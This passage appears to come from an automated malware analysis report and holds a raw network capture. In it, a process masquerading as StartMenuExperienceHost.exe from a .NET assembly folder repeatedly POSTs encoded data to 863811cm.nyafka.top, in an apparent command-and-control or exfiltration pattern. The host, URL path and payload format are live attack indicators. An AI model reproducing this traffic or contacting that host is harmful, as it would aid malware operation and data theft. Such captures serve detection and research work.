                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWSQe2Ppxg0YlQHHxIfik7hqS%2BWltW0cQlJna30Yf6mh6ToNRTiFZfceB%2Fl49Xdqab0m6hSd%2BSLXDyXSCzR%2B%2FS%2B0%2BY2Gib7fr9%2FX57bAbYLi2BomlPhUOP3SF7NhgWzkulQklgWN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f7f3af541d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 14 2a 07 08 55 37 2d 33 10 3b 0f 23 01 29 3d 26 5e 3f 32 33 10 31 1a 3c 01 2e 3c 39 52 35 05 24 17 28 3c 00 13 26 3c 2b 59 3c 0b 2a 51 03 1b 39 13 2b 23 01 55 2b 21 35 5c 28 22 3e 01 27 0d 29 42 3d 03 2d 57 33 00 21 06 21 21 0a 55 2a 02 23 1e 2f 2b 23 07 2a 16 0c 5c 20 01 2a 5f 08 13 39 1e 3e 38 2c 1c 35 24 25 5f 36 2d 38 0e 22 29 36 53 29 07 29 0f 30 30 2c 17 2f 1c 38 59 21 2c 20 09 21 2f 3e 1d 37 3d 3f 01 26 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98'*U7-3;#)=&^?231<.<9R5$(<&<+Y<*Q9+#U+!5\(">')B=-W3!!!U*#/+#*\ *_9>8,5$%_6-8")6S))00,/8Y!, !/>7=?&8"_")Q?TR0
                                                                Oct 11, 2024 01:36:57.879719973 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:57.979098082 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:57.979929924 CEST2004OUTData Raw: 55 5d 58 58 54 5d 58 52 5e 5a 55 58 51 53 5a 52 57 5f 58 55 55 5c 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]XXT]XR^ZUXQSZRW_XUU\Q_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:(3(%/(C/6+[(3"#B#P'.:>^+51X*+#Y$/\*9
                                                                Oct 11, 2024 01:36:58.242364883 CEST742INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tT1YNlDrdAMirV261WAu%2BiN66xJElhehqZRuAwnHBYnhSvkIFpG55n4BPrJ5Zcu5OcSczOAt1K2vtYzxFPbPJTKMKxlC72Qpi0CadDUrMcW5CYrQMY796Doxo6JZjWI1%2FJ3rxMSX"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f820e2541d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 27 15 29 17 07 0e 23 3e 0e 00 3b 1f 3c 5a 2a 2e 32 5e 28 31 2b 1d 25 27 3f 5e 2e 3c 07 57 22 38 3c 5c 29 5a 2a 5b 30 02 38 05 29 31 2a 51 03 1b 39 12 3c 0a 30 0f 28 22 35 19 3c 0c 2e 06 24 1d 2a 1b 2a 3e 3d 54 33 10 2e 58 36 32 3b 0c 3e 12 2c 0f 38 3b 02 19 2a 3b 2d 00 23 3b 2a 5f 08 13 39 1d 29 06 24 50 35 27 3d 1a 21 2d 37 52 22 00 3a 57 3f 39 2a 13 24 0a 38 1a 2d 32 24 12 23 3f 27 1d 21 05 22 1e 37 3d 3c 13 32 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98')#>;<Z*.2^(1+%'?^.<W"8<\)Z*[08)1*Q9<0("5<.$**>=T3.X62;>,8;*;-#;*_9)$P5'=!-7R":W?9*$8-2$#?'!"7=<28"_")Q?TR0
                                                                Oct 11, 2024 01:36:58.242676020 CEST310OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 540
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:58.337806940 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:58.340290070 CEST540OUTData Raw: 50 5b 5d 54 51 5c 58 5f 5e 5a 55 58 51 53 5a 5c 57 5d 58 54 55 55 51 5e 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P[]TQ\X_^ZUXQSZ\W]XTUUQ^XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9+4\<8%+C,_63[?47Q&=-*F!0^*#Y$/\*9
                                                                Oct 11, 2024 01:36:58.601186037 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V1pd7WsS6rS6kG2YWKenOI06p5kF6JiqdE8%2Fy7W3UtNUgl798ZRE0JEO23kYTISFtwvP1GyMo9p2Yd5YSxRBFKcqPAtB4lUwwvtyKWcaXFzN3XbtmEGjPHleu2eGvzVH%2BUG6zpJU"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f84492b41d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:58.601497889 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:58.717273951 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:58.717569113 CEST2004OUTData Raw: 55 58 5d 5b 51 59 58 51 5e 5a 55 58 51 52 5a 52 57 5f 58 5d 55 52 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UX][QYXQ^ZUXQRZRW_X]URQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X+=#>9;&= <<68?+*7;$-U>846W<[(;#Y$/\*
                                                                Oct 11, 2024 01:36:59.016705036 CEST756INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k0j4RoytSS1%2BYXcY4v%2BHPPt%2Fm5sh%2Fjz9sfN4AEpVI3Zcvtal5kKxZ060gQurJuiPfhYP4%2BXeBb103SV%2BrgYpIImqa2DxArEhAol0sGgtRNP4GKw0AS%2BE%2BJk6Yo%2BOii7yu4bpY7mq"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f869c6141d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 06 29 2a 2d 0b 22 2e 01 11 2c 21 3f 03 3d 03 3e 16 3f 32 27 13 25 37 2b 14 39 02 3a 0e 35 05 09 06 3e 02 0b 02 27 3c 06 03 29 21 2a 51 03 1b 3a 06 3c 20 34 0f 29 21 2d 17 2b 21 2d 15 26 23 31 44 29 04 22 09 25 3e 0f 04 35 31 28 55 3e 5a 30 0d 38 28 33 07 2a 2b 22 1e 21 3b 2a 5f 08 13 3a 0e 2a 38 05 0d 22 19 3e 04 22 13 1a 0a 22 17 29 0f 3d 17 2e 55 25 30 2c 5d 38 31 38 58 23 2c 33 55 22 3c 3e 56 23 5b 3c 59 26 12 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$)*-".,!?=>?2'%7+9:5>'<)!*Q:< 4)!-+!-&#1D)"%>51(U>Z08(3*+"!;*_:*8">"")=.U%0,]818X#,3U"<>V#[<Y&"_")Q?TR0
                                                                Oct 11, 2024 01:36:59.016974926 CEST346OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: multipart/form-data; boundary=----NHB4gCvyF09nvGpdQX0ryrYNSBUL2ro1PG
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 3182
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:59.111753941 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:59.111964941 CEST3182OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 48 42 34 67 43 76 79 46 30 39 6e 76 47 70 64 51 58 30 72 79 72 59 4e 53 42 55 4c 32 72 6f 31 50 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                Data Ascii: ------NHB4gCvyF09nvGpdQX0ryrYNSBUL2ro1PGContent-Disposition: form-data; name="0"Content-Type: text/plainU_XXT]]Q^ZUXQSZRW^XYUTQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^P
                                                                Oct 11, 2024 01:36:59.374612093 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6ZJEtbaTJf9AIj2WHC9UZKQzm8idlGnal2sK%2FVLOTbZ1if7Aa%2FmXANlVoyDfZthxcmgnjlxmlmvIdec9COZeKJ4EdaWrIby2qqBOTGtQFp0CUFw6CfkVY%2BZMgxA5usm79KLTrCCi"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f892fdb41d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0
                                                                Oct 11, 2024 01:36:59.385797977 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:59.480685949 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:59.482184887 CEST2004OUTData Raw: 50 5f 58 5d 54 5d 58 50 5e 5a 55 58 51 5c 5a 5f 57 59 58 5b 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P_X]T]XP^ZUXQ\Z_WYX[UPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9X<>0?#1=,<#+<3:!7;R'"=8C"2 *#Y$/\*
                                                                Oct 11, 2024 01:36:59.790792942 CEST746INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O18sZMpSj8%2F9hiwkhXQ3ghM9%2B0PEFdyjKRXV2vyc6HdgTFt5MGv6X8ZyCaW3tEMZY4ETpWvLtkfhK4Xm4Ox2Xwyd8JIsC7YuM6G0%2BHxl0Ueot93P8KjI%2BjP5RVZNI35qU64T4dIK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f8b7aa441d5-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 39 38 0d 0a 06 12 24 01 2a 5f 32 54 37 3e 34 05 38 31 3c 5e 29 3d 3d 06 28 0f 23 58 32 1d 38 00 2e 5a 22 0a 23 28 28 5e 29 12 00 5e 24 12 27 58 29 31 2a 51 03 1b 3a 03 28 33 3b 13 3c 21 2e 03 28 1c 00 05 24 1d 1c 1c 2a 2d 29 1f 24 07 26 16 22 1f 20 54 3d 2f 27 52 2c 3b 05 43 3d 06 25 04 34 01 2a 5f 08 13 3a 0c 2a 28 0e 1c 22 37 04 04 36 03 15 1e 35 3a 39 08 3d 2a 26 55 33 33 28 1a 3b 54 3c 5b 20 2c 30 09 22 05 22 56 21 3d 0e 1e 25 38 22 5f 22 00 29 51 00 3f 54 52 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 98$*_2T7>481<^)==(#X28.Z"#((^)^$'X)1*Q:(3;<!.($*-)$&" T=/'R,;C=%4*_:*("765:9=*&U33(;T<[ ,0""V!=%8"_")Q?TR0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                44192.168.2.549980188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:57.224558115 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:57.582928896 CEST2584OUTData Raw: 50 52 5d 5b 51 5c 58 56 5e 5a 55 58 51 50 5a 5e 57 58 58 5d 55 57 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: PR][Q\XV^ZUXQPZ^WXX]UWQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:)>+>*%<+"<S +R3-:);4B !3=#Y$/\*5
                                                                Oct 11, 2024 01:36:57.668411016 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:57.925617933 CEST599INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:57 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FWiQYgLKYJhTmiup%2Bj%2FNjkgPjDIC54JnTel24%2FlPO%2FTHMnFnltRccZdG6dRFgmUp7dEkRvz1NIcZBX%2FS9ViLjrvwvfABNRCt6TrBhb4qGCqA9uODrKsz4NTg3tsEwTkJl2bXahvf"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f8028954343-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                45192.168.2.549986188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:58.079570055 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:58.425720930 CEST2584OUTData Raw: 55 58 58 5f 54 54 58 54 5e 5a 55 58 51 56 5a 53 57 5a 58 5e 55 55 51 5c 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: UXX_TTXT^ZUXQVZSWZX^UUQ\XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9]?4\+98&,A?&0\!;Y(3-T B+W'.!*8+51(+#Y$/\*-
                                                                Oct 11, 2024 01:36:58.546412945 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:58.809245110 CEST593INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:58 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nri8b6GRgk%2FMjLVXoMqGpAIR%2BUREoUxjQj0ROXj4Hs9wXV0VF4laa3Pjs5qdttJ5gNHHgSPl6qWzNr0fhdEv0lfaOH7bN5hZRQk67y2iwnwt4L57R4Y14ApzdzumBZUSRO234aSm"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f859c37727b-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                46192.168.2.549992188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:58.925611019 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:36:59.315968990 CEST2584OUTData Raw: 55 5d 5d 5b 54 59 5d 51 5e 5a 55 58 51 5c 5a 5a 57 5f 58 55 55 50 51 5b 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U]][TY]Q^ZUXQ\ZZW_XUUPQ[XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z9_(.3+*,2<? #(,<3 4(3."(;(F!"#=#Y$/\*
                                                                Oct 11, 2024 01:36:59.376554012 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:36:59.691267014 CEST595INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:36:59 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yog1ddgCKH3hLHaStggrkALtxZEQAYzzwcQJKbhGIUgix9uTwWdCdCjiUDO5uHAHG%2FaEvfbSbZk%2FhFJUfzZiZBW55M1F6YO7qrG4AvE2EGtUUlt7tyGJIgWYH330FIme9cRO%2F5U3"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f8acf984201-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 44Z^Q0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                47192.168.2.549999188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:59.817110062 CEST311OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2584
                                                                Expect: 100-continue
                                                                Oct 11, 2024 01:37:00.175939083 CEST2584OUTData Raw: 55 5e 5d 55 51 58 58 5e 5e 5a 55 58 51 56 5a 5a 57 5f 58 59 55 5d 51 52 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: U^]UQXX^^ZUXQVZZW_XYU]QRXED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:<=$<9/%>,+?"8'+U:7$8$=U)(8A5,Y)+#Y$/\*-
                                                                Oct 11, 2024 01:37:00.279911995 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:00.457871914 CEST588INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:00 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                cf-cache-status: DYNAMIC
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zsnjWKklqEDcIkS2ZhyDc%2FaVnRLGOMWbVcxVg4glyHVQa%2BbvpBamGq2xJh5RF247kHmfvC6NDUHppsFB3Z3Et5dhWPGnvQ6TDWLKCxvfcz0UnPEtEJZmKh2iQVbqhpHkCPCHvPRp"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d0a6f906da743e8-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                Data Raw: 34 0d 0a 34 5a 5e 51 0d 0a
                                                                Data Ascii: 44Z^Q
                                                                Oct 11, 2024 01:37:00.548173904 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                48192.168.2.550001188.114.96.3807724C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe
                                                                TimestampBytes transferredDirectionData
                                                                Oct 11, 2024 01:36:59.900919914 CEST335OUTPOST /video_RequestpacketUpdategeneratorPublic.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                Host: 863811cm.nyafka.top
                                                                Content-Length: 2004
                                                                Expect: 100-continue
                                                                Connection: Keep-Alive
                                                                Oct 11, 2024 01:37:00.254369020 CEST2004OUTData Raw: 50 5c 5d 59 51 59 58 50 5e 5a 55 58 51 56 5a 52 57 59 58 55 55 50 51 5f 58 45 44 5c 50 5d 5f 53 5a 5e 56 55 54 5d 54 5e 5f 59 54 5a 55 57 55 52 50 53 43 5d 47 56 51 51 55 53 56 5f 55 53 5b 54 5f 56 43 47 57 5c 57 51 59 5f 5d 5e 5a 54 5e 50 51 59
                                                                Data Ascii: P\]YQYXP^ZUXQVZRWYXUUPQ_XED\P]_SZ^VUT]T^_YTZUWURPSC]GVQQUSV_US[T_VCGW\WQY_]^ZT^PQYYQQZUAQ^X]]XU[^_FWT^[UYPZYZXAW\YURCY]QY_Z]QV[XX^PVZZTS]]V_[]]]X\UZU^W_Y^GSXYRYG\CU__QUU_V]T_ZVCWP^_X[Z:+#<)#T%-<+6(]#+( )S47$-.*8+!!$Y*#Y$/\*-
                                                                Oct 11, 2024 01:37:00.354840994 CEST25INHTTP/1.1 100 Continue
                                                                Oct 11, 2024 01:37:00.601830959 CEST743INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 23:37:00 GMT
